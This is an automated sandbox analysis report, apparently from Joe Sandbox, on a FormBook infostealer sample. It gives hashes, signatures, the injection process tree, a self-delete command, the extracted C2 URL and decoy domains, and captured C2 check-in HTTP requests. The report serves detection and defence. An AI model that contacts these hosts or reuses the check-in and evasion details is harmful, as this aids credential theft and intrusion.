Analysis Report INV74321.exe

Overview

General Information

Sample Name: INV74321.exe
Analysis ID: 411840
MD5: 877bb5661fe79bb7f48cfb3ea54537a0
SHA1: dd6b5263da3b4f1a42e89c2c1ade852098561c5d
SHA256: 87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • INV74321.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
    • INV74321.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6292 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\INV74321.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.1.INV74321.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      1.1.INV74321.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      1.1.INV74321.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      0.2.INV74321.exe.29a0000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0.2.INV74321.exe.29a0000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll, Metadefender: Detection: 26%
          Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll, ReversingLabs: Detection: 55%
          Multi AV Scanner detection for submitted file
          Source: INV74321.exe, Virustotal: Detection: 30%
          Source: INV74321.exe, Metadefender: Detection: 14%
          Source: INV74321.exe, ReversingLabs: Detection: 72%
          Yara detected FormBook
          Source: Yara match, File source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.1.INV74321.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.INV74321.exe.29a0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.INV74321.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: INV74321.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: INV74321.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 4x nop then pop ebx, 1_2_00406A95
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 4x nop then pop ebx, 1_1_00406A95
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop ebx, 8_2_030B6A95

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.nobleandmarble.com/or4i/
          Source: global traffic, HTTP traffic detected: GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1; Host: www.king-jackpot.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1; Host: www.0o-a-8v4l76.net; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1; Host: www.downtoearthwork.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1; Host: www.topcasino-111.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1; Host: www.shebagholdings.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1; Host: www.booweats.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1; Host: www.xn--espacesacr-k7a.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View, IP Address: 64.190.62.111
          Source: Joe Sandbox View, ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox View, ASN Name: PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox View, ASN Name: NBS11696US
          Source: unknown, DNS traffic detected: queries for: www.aqayeseo.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Wed, 12 May 2021 05:36:25 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Last-Modified: Wed, 24 Feb 2021 17:47:31 GMT; Accept-Ranges: bytes; Content-Length: 583; Vary: Accept-Encoding; Content-Type: text/html; Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_0041826C NtReadFile,1_2_0041826C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_004182EA NtClose,1_2_004182EA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B198F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B19860
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19840 NtDelayExecution,LdrInitializeThunk,1_2_00B19840
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B199A0 NtCreateSection,LdrInitializeThunk,1_2_00B199A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B19910
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A20 NtResumeThread,LdrInitializeThunk,1_2_00B19A20
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B19A00
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A50 NtCreateFile,LdrInitializeThunk,1_2_00B19A50
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B195D0 NtClose,LdrInitializeThunk,1_2_00B195D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19540 NtReadFile,LdrInitializeThunk,1_2_00B19540
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B196E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B19660
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B197A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B19780
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,1_2_00B19FE0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B19710
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B198A0 NtWriteVirtualMemory,1_2_00B198A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19820 NtEnumerateKey,1_2_00B19820
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1B040 NtSuspendThread,1_2_00B1B040
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B199D0 NtCreateProcessEx,1_2_00B199D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19950 NtQueueApcThread,1_2_00B19950
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A80 NtOpenDirectoryObject,1_2_00B19A80
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19A10 NtQuerySection,1_2_00B19A10
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A3B0 NtGetContextThread,1_2_00B1A3B0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19B00 NtSetValueKey,1_2_00B19B00
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B195F0 NtQueryInformationFile,1_2_00B195F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1AD30 NtSetContextThread,1_2_00B1AD30
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19520 NtWaitForSingleObject,1_2_00B19520
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19560 NtWriteFile,1_2_00B19560
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B196D0 NtCreateKey,1_2_00B196D0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19610 NtEnumerateValueKey,1_2_00B19610
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19670 NtQueryInformationProcess,1_2_00B19670
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19650 NtQueryValueKey,1_2_00B19650
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19730 NtQueryVirtualMemory,1_2_00B19730
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A710 NtOpenProcessToken,1_2_00B1A710
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19770 NtSetInformationFile,1_2_00B19770
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1A770 NtOpenThread,1_2_00B1A770
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B19760 NtOpenProcess,1_2_00B19760
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004181BA NtCreateFile,1_1_004181BA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_0041826C NtReadFile,1_1_0041826C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_1_004182EA NtClose,1_1_004182EA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A50 NtCreateFile,LdrInitializeThunk,8_2_03789A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03789910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037899A0 NtCreateSection,LdrInitializeThunk,8_2_037899A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03789860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789840 NtDelayExecution,LdrInitializeThunk,8_2_03789840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789710 NtQueryInformationToken,LdrInitializeThunk,8_2_03789710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789FE0 NtCreateMutant,LdrInitializeThunk,8_2_03789FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789780 NtMapViewOfSection,LdrInitializeThunk,8_2_03789780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03789660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789650 NtQueryValueKey,LdrInitializeThunk,8_2_03789650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037896E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_037896E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037896D0 NtCreateKey,LdrInitializeThunk,8_2_037896D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789540 NtReadFile,LdrInitializeThunk,8_2_03789540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037895D0 NtClose,LdrInitializeThunk,8_2_037895D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789B00 NtSetValueKey,8_2_03789B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378A3B0 NtGetContextThread,8_2_0378A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A20 NtResumeThread,8_2_03789A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A10 NtQuerySection,8_2_03789A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03789A00 NtProtectVirtualMemory,8_2_03789A00
